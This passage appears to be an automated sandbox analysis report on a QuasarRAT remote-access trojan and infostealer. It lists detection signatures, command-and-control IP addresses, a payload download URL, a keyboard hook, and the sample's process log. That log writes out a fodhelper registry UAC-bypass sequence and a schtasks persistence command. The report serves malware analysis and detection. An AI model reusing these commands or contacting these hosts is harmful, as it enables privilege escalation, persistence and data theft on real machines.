"MIIE9DCCAtygAwIBAgIQAP7MVinYG7Bp3TFCaecT6TANBgkqhkiG9w0BAQ0FADAbMRkwFwYDVQQDDBBRdWFzYXIgU2VydmVyIENBMCAXDTI0MTIyMjIyNDYzNloYDzk5OTkxMjMxMjM1OTU5WjAbMRkwFwYDVQQDDBBRdWFzYXIgU2VydmVyIENBMIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIICCgKCAgEArQWo0/U8Y+iecER1g4fmpySyrvJ27IFqh+4hpoOcxOWRg2MPgZoEpiKbDKmR3ybU4FnButfT/zFfD9r+2IytYCZDaYXxt1Z6Uh9liQaTi3xnQ3/K5LUjXLcdonTjGABFZb153VLUsYTX2jkI71X17RMNAMrxLDbp7pAQTa0zHLtA4nI+CK0TTHViT3iv6qfkPHww2s6Y+JGv0XBy8lsQAjRG5YBj7ta4/dUupzZ1+UQw3Ipf/8SqehU+49rkJRq6P39D5+2NTyoWZhRJkmZYMaFAmn0alYmwiHXg36D7T0RB9/khzOo5JQ5d9FpVWZUJJHtItHPChwBeToi8rT+ZDqVUmsHUpnmSK2/RXycYRdTf24MJ4gED0G69InjzW5qkCXfQH7/HLy0OYxP7iTVex+NLGzfqIyMDhDP+b72LFKr2UGwS3h0jHOYkF65yCNyMMAFvRjK/WWvMNO7LueSoCLX+ijLOMSs7XS0jMOZklObQMV9QhHy9XLeuKIMeDLBzB+NyLUC2ik64559Av9jqC2M5Ivd2sfj1cjzWdu2M4WM4HAd4A9hrR/mOxkQAtM6sRPiSufoUpj6JzwJjHwV53e26JuH7CAdHGZez3agrR9pxGpNbDBxCjpMPH4xB8I357QlczMKv0brho/F98JfHBps5VPMdnu2W8A0TeMZgJTUCAwEAAaMyMDAwHQYDVR0OBBYEFBgjvy7htPmbZGKaAGsHHUifFGuxMA8GA1UdEwEB/wQFMAMBAf8wDQYJKoZIhvcNAQENBQADggIBAHcDbotBjyWn9JWripLhOMzIvcAbF9/iJ2N4JMIC0GHWxzoNgh0IOkPb3PqUwT/NcSxbvVQVY3oftMX+ywh3ZzqiqZWGsQC/ZyhdKIsbahAX1OHCIxcIDHg9qhZUK7pLtOvJkXkUJ4o8Cs5sSxpHRj/46vmHGRRLkgV+2Ej3s8fygROrZUVJwY+UcfDAm77CyTz2BbveHlXiitPkfedJ2+IXSAX6KwVWJTOzTTykw+lJtzfIWQBO4H3z+mNQEXE47qikiH6pTF1aVSh24/S9LJlAu/w/RJ+PIFUslzgfz5wiMJzI9E4cHLXCaXoarscBV+Vga40IZ8TYa4RDp5oQ8clgm8JTCZMH/TaLLHbePZ/hSvRy0S7CkJPa0YPbCxqzf/BWqW64uhmiBpJbaP6uZKGqbNO9c+KDASK/e21q/ViZy4Qo7G3WGnZd7EXi1psG4zxVt8wF3Qhibp/pQi1tyfJDRhcRyIfc3YsaOrLDd89yJ/O2UfnN4MflCFAufBXLfkUycDZv26mvszaY9c/3N8F8JoLo4kDxLEYbJJq/5jDMWjGh6brCo7mI++Wu2tGd6v+32gqeaZXrqJCj6pMxZriQa11g/A8Ug6cSJDiAh+Spn8RpNUjMWXACvmPHfzW08YD2+pKB0nlrIf7KIKihl06p0W+NWB5yWjUvp6j+CFvn"}
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeReversingLabs: Detection: 73%
                      Source: Dd5DwDCHJD.exeReversingLabs: Detection: 73%
                      Source: Dd5DwDCHJD.exeVirustotal: Detection: 73%Perma Link
                      Source: Yara matchFile source: Dd5DwDCHJD.exe, type: SAMPLE
                      Source: Yara matchFile source: 0.0.Dd5DwDCHJD.exe.cb0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.1741000374.000000001BE36000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000000.1662187645.0000000000CB2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: Dd5DwDCHJD.exe PID: 7324, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Client.exe PID: 7452, type: MEMORYSTR
                      Source: Yara matchFile source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exe, type: DROPPED
                      Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeJoe Sandbox ML: detected
                      Source: Dd5DwDCHJD.exeJoe Sandbox ML: detected

                      Privilege Escalation

                      barindex
                      Source: C:\Windows\System32\reg.exeRegistry value created: NULL C:\Users\user\AppData\Roaming\$77-cmd\Client.exeJump to behavior
                      Source: C:\Windows\System32\reg.exeRegistry value created: DelegateExecute Jump to behavior
                      Source: C:\Windows\System32\reg.exeRegistry value created: NULL C:\Users\user\AppData\Roaming\$77-cmd\Install.exe
                      Source: C:\Windows\System32\reg.exeRegistry value created: DelegateExecute
                      Source: Dd5DwDCHJD.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: Dd5DwDCHJD.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                      Networking

                      barindex
                      Source: Network trafficSuricata IDS: 2027619 - Severity 1 - ET MALWARE Observed Malicious SSL Cert (Quasar CnC) : 193.31.28.181:4004 -> 192.168.2.4:49731
                      Source: Network trafficSuricata IDS: 2035595 - Severity 1 - ET MALWARE Generic AsyncRAT Style SSL Cert : 193.31.28.181:4004 -> 192.168.2.4:49731
                      Source: Malware configuration extractorURLs: 193.31.28.181
                      Source: Yara matchFile source: Dd5DwDCHJD.exe, type: SAMPLE
                      Source: Yara matchFile source: 0.0.Dd5DwDCHJD.exe.cb0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exe, type: DROPPED
                      Source: global trafficTCP traffic: 192.168.2.4:49731 -> 193.31.28.181:4004
                      Source: global trafficHTTP traffic detected: GET /Files/Install.exe HTTP/1.1Host: 45.83.244.141Connection: Keep-Alive
                      Source: Joe Sandbox ViewASN Name: QUICKPACKETUS QUICKPACKETUS
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.83.244.141
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.83.244.141
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.83.244.141
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.83.244.141
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.83.244.141
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.31.28.181
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.31.28.181
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.31.28.181
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.31.28.181
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.31.28.181
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.31.28.181
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.31.28.181
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.31.28.181
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.31.28.181
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.31.28.181
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.31.28.181
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.31.28.181
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.31.28.181
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.31.28.181
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.31.28.181
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.31.28.181
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.31.28.181
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.31.28.181
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.31.28.181
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.31.28.181
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.31.28.181
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.31.28.181
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.31.28.181
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.31.28.181
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.31.28.181
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.31.28.181
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.31.28.181
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.31.28.181
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.31.28.181
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.31.28.181
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.31.28.181
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.31.28.181
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.31.28.181
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.31.28.181
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.31.28.181
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.31.28.181
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.31.28.181
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.31.28.181
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.31.28.181
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.31.28.181
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.31.28.181
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.31.28.181
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.31.28.181
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.31.28.181
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.31.28.181
                      Source: global trafficHTTP traffic detected: GET /Files/Install.exe HTTP/1.1Host: 45.83.244.141Connection: Keep-Alive
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 01 Jan 2025 04:57:04 GMTServer: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12Content-Length: 299Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 38 20 28 57 69 6e 36 34 29 20 4f 70 65 6e 53 53 4c 2f 33 2e 31 2e 33 20 50 48 50 2f 38 2e 32 2e 31 32 20 53 65 72 76 65 72 20 61 74 20 34 35 2e 38 33 2e 32 34 34 2e 31 34 31 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 Server at 45.83.244.141 Port 80</address></body></html>
                      Source: Dd5DwDCHJD.exe, 00000000.00000002.1729416327.0000000003351000.00000004.00000800.00020000.00000000.sdmp, Dd5DwDCHJD.exe, 00000000.00000002.1729416327.000000000368C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.83.244.141
                      Source: Dd5DwDCHJD.exe, Client.exe.0.drString found in binary or memory: http://45.83.244.141/Files/Install.exe
                      Source: Client.exe, 00000003.00000002.4131360857.000000001CC79000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft.
                      Source: Client.exe, 00000003.00000002.4128730464.000000001BF90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/
                      Source: Client.exe, 00000003.00000002.4128730464.000000001BF90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/Low
                      Source: Client.exe, 00000003.00000002.4122058134.0000000001644000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
                      Source: Client.exe, 00000003.00000002.4128730464.000000001BF90000.00000004.00000020.00020000.00000000.sdmp, 77EC63BDA74BD0D0E0426DC8F8008506.3.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
                      Source: Client.exe, 00000003.00000002.4128730464.000000001C046000.00000004.00000020.00020000.00000000.sdmp, Client.exe, 00000003.00000002.4128730464.000000001C0AD000.00000004.00000020.00020000.00000000.sdmp, Client.exe, 00000003.00000002.4128730464.000000001BF90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?1f20f79e38945
                      Source: Client.exe, 00000003.00000002.4122058134.0000000001644000.00000004.00000020.00020000.00000000.sdmp, Client.exe, 00000003.00000002.4128730464.000000001C046000.00000004.00000020.00020000.00000000.sdmp, Client.exe, 00000003.00000002.4128730464.000000001BF90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?40f85619b3dd2
                      Source: Client.exe, 00000003.00000002.4128730464.000000001BF90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?7e09797e8ee72
                      Source: Client.exe, 00000003.00000002.4128730464.000000001C046000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?8
                      Source: Client.exe, 00000003.00000002.4128730464.000000001C0D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?87a6d18be4cd5
                      Source: Client.exe, 00000003.00000002.4131360857.000000001CC5C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabX
                      Source: Client.exe, 00000003.00000002.4128110250.000000001BDF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com:80/msdownload/update/v3/static/trustedr/en/authrootstl.cab?1f20f79e38
                      Source: Dd5DwDCHJD.exe, 00000000.00000002.1729416327.0000000003351000.00000004.00000800.00020000.00000000.sdmp, Client.exe, 00000003.00000002.4123066186.0000000003479000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: Dd5DwDCHJD.exe, Client.exe.0.drString found in binary or memory: https://api.ipify.org/
                      Source: Dd5DwDCHJD.exe, Client.exe.0.drString found in binary or memory: https://ipwho.is/
                      Source: Dd5DwDCHJD.exe, Client.exe.0.drString found in binary or memory: https://stackoverflow.com/q/11564914/23354;
                      Source: Dd5DwDCHJD.exe, Client.exe.0.drString found in binary or memory: https://stackoverflow.com/q/14436606/23354
                      Source: Dd5DwDCHJD.exe, Client.exe.0.drString found in binary or memory: https://stackoverflow.com/q/2152978/23354sCannot

                      Key, Mouse, Clipboard, Microphone and Screen Capturing

                      barindex
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeWindows user hook set: 0 keyboard low level C:\Users\user\AppData\Roaming\$77-cmd\Client.exeJump to behavior

                      E-Banking Fraud

                      barindex
                      Source: Yara matchFile source: Dd5DwDCHJD.exe, type: SAMPLE
                      Source: Yara matchFile source: 0.0.Dd5DwDCHJD.exe.cb0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.1741000374.000000001BE36000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000000.1662187645.0000000000CB2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: Dd5DwDCHJD.exe PID: 7324, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Client.exe PID: 7452, type: MEMORYSTR
                      Source: Yara matchFile source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exe, type: DROPPED

                      System Summary

                      barindex
                      Source: Dd5DwDCHJD.exe, type: SAMPLEMatched rule: Detects QuasarRAT malware Author: Florian Roth
                      Source: Dd5DwDCHJD.exe, type: SAMPLEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                      Source: Dd5DwDCHJD.exe, type: SAMPLEMatched rule: Detects Quasar infostealer Author: ditekshen
                      Source: 0.0.Dd5DwDCHJD.exe.cb0000.0.unpack, type: UNPACKEDPEMatched rule: Detects QuasarRAT malware Author: Florian Roth
                      Source: 0.0.Dd5DwDCHJD.exe.cb0000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                      Source: 0.0.Dd5DwDCHJD.exe.cb0000.0.unpack, type: UNPACKEDPEMatched rule: Detects Quasar infostealer Author: ditekshen
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exe, type: DROPPEDMatched rule: Detects QuasarRAT malware Author: Florian Roth
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exe, type: DROPPEDMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exe, type: DROPPEDMatched rule: Detects Quasar infostealer Author: ditekshen
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeProcess Stats: CPU usage > 49%
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeCode function: 3_2_00007FFD9BAFAFDD3_2_00007FFD9BAFAFDD
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeCode function: 3_2_00007FFD9BAF9BD13_2_00007FFD9BAF9BD1
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeCode function: 3_2_00007FFD9BAF92713_2_00007FFD9BAF9271
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeCode function: 3_2_00007FFD9BAF55D63_2_00007FFD9BAF55D6
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeCode function: 3_2_00007FFD9BAF621F3_2_00007FFD9BAF621F
                      Source: Dd5DwDCHJD.exe, 00000000.00000000.1662500018.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilename. vs Dd5DwDCHJD.exe
                      Source: Dd5DwDCHJD.exeBinary or memory string: OriginalFilename. vs Dd5DwDCHJD.exe
                      Source: Dd5DwDCHJD.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKCU\Software\Classes\ms-settings\shell\open\command" /ve /d "C:\Users\user\AppData\Roaming\$77-cmd\Client.exe" /f
                      Source: Dd5DwDCHJD.exe, type: SAMPLEMatched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
                      Source: Dd5DwDCHJD.exe, type: SAMPLEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                      Source: Dd5DwDCHJD.exe, type: SAMPLEMatched rule: MALWARE_Win_QuasarStealer author = ditekshen, description = Detects Quasar infostealer, clamav_sig = MALWARE.Win.Trojan.QuasarStealer
                      Source: 0.0.Dd5DwDCHJD.exe.cb0000.0.unpack, type: UNPACKEDPEMatched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
                      Source: 0.0.Dd5DwDCHJD.exe.cb0000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                      Source: 0.0.Dd5DwDCHJD.exe.cb0000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_QuasarStealer author = ditekshen, description = Detects Quasar infostealer, clamav_sig = MALWARE.Win.Trojan.QuasarStealer
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exe, type: DROPPEDMatched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exe, type: DROPPEDMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exe, type: DROPPEDMatched rule: MALWARE_Win_QuasarStealer author = ditekshen, description = Detects Quasar infostealer, clamav_sig = MALWARE.Win.Trojan.QuasarStealer
                      Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winEXE@50/11@0/2
                      Source: C:\Users\user\Desktop\Dd5DwDCHJD.exeFile created: C:\Users\user\AppData\Roaming\$77-cmdJump to behavior
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeMutant created: NULL
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7672:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7768:120:WilError_03
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeMutant created: \Sessions\1\BaseNamedObjects\Local\704ccf6d-01bf-4037-a807-12a60509b1a4
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7368:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7804:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7488:120:WilError_03
                      Source: C:\Users\user\Desktop\Dd5DwDCHJD.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\$77-cmd\UACBypass1.bat" "
                      Source: Dd5DwDCHJD.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: Dd5DwDCHJD.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                      Source: C:\Users\user\Desktop\Dd5DwDCHJD.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                      Source: C:\Users\user\Desktop\Dd5DwDCHJD.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: Dd5DwDCHJD.exeReversingLabs: Detection: 73%
                      Source: Dd5DwDCHJD.exeVirustotal: Detection: 73%
                      Source: Dd5DwDCHJD.exeString found in binary or memory: *.exeMhttp://45.83.244.141/Files/Install.exe
                      Source: Dd5DwDCHJD.exeString found in binary or memory: HasSubValue3Conflicting item/add type
                      Source: C:\Users\user\Desktop\Dd5DwDCHJD.exeFile read: C:\Users\user\Desktop\Dd5DwDCHJD.exeJump to behavior
                      Source: unknownProcess created: C:\Users\user\Desktop\Dd5DwDCHJD.exe "C:\Users\user\Desktop\Dd5DwDCHJD.exe"
                      Source: C:\Users\user\Desktop\Dd5DwDCHJD.exeProcess created: C:\Windows\System32\schtasks.exe "schtasks" /create /tn "$77-cmd" /sc ONLOGON /tr "C:\Users\user\AppData\Roaming\$77-cmd\Client.exe" /rl HIGHEST /f
                      Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: unknownProcess created: C:\Users\user\AppData\Roaming\$77-cmd\Client.exe C:\Users\user\AppData\Roaming\$77-cmd\Client.exe
                      Source: C:\Users\user\Desktop\Dd5DwDCHJD.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\$77-cmd\UACBypass1.bat" "
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKCU\Software\Classes\ms-settings\shell\open\command" /ve /d "C:\Users\user\AppData\Roaming\$77-cmd\Client.exe" /f
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKCU\Software\Classes\ms-settings\shell\open\command" /v "DelegateExecute" /f
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\fodhelper.exe fodhelper.exe
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout /t 2 /nobreak
                      Source: C:\Windows\System32\fodhelper.exeProcess created: C:\Users\user\AppData\Roaming\$77-cmd\Client.exe "C:\Users\user\AppData\Roaming\$77-cmd\Client.exe"
                      Source: C:\Users\user\AppData\Roaming\$77-cmd\Client.exeProcess created: C:\Windows\System32\schtasks.exe "schtasks" /create /tn "$77-cmd" /sc ONLOGON /tr "C:\Users\user\AppData\Roaming\$77-cmd\Client.exe" /rl HIGHEST /f
                      Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg delete "HKCU\Software\Classes\ms-settings\shell\open\command" /f
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c del "C:\Users\user\AppData\Roaming\$77-cmd\UACBypass1.bat"
                      Source: C:\Users\user\Desktop\Dd5DwDCHJD.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\$77-cmd\UACBypass2.bat" "
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\Dd5DwDCHJD.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\$77-cmd\Melt.bat" "
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg delete "HKCU\Software\Classes\ms-settings\shell\open\command" /f
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout /t 5 /nobreak
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKCU\Software\Classes\ms-settings\shell\open\command" /ve /d "C:\Users\user\AppData\Roaming\$77-cmd\Install.exe" /f
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKCU\Software\Classes\ms-settings\shell\open\command" /v "DelegateExecute" /f
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\fodhelper.exe fodhelper.exe
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout /t 2 /nobreak
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg delete "HKCU\Software\Classes\ms-settings\shell\open\command" /f
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c del "C:\Users\user\AppData\Roaming\$77-cmd\UACBypass2.bat"
                      Source: C:\Users\user\Desktop\Dd5DwDCHJD.exeProcess created: C:\Windows\System32\schtasks.exe "schtasks" /create /tn "$77-cmd" /sc ONLOGON /tr "C:\Users\user\AppData\Roaming\$77-cmd\Client.exe" /rl HIGHEST /fJump to behavior
                      Source: C:\Users\user\Desktop\Dd5DwDCHJD.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\$77-cmd\UACBypass1.bat" "Jump to behavior
                      Source: C:\Users\user\Desktop\Dd5DwDCHJD.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\$77-cmd\UACBypass2.bat" "Jump to behavior
                      Source: C:\Users\user\Desktop\Dd5DwDCHJD.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\$77-cmd\Melt.bat" "Jump to behavior
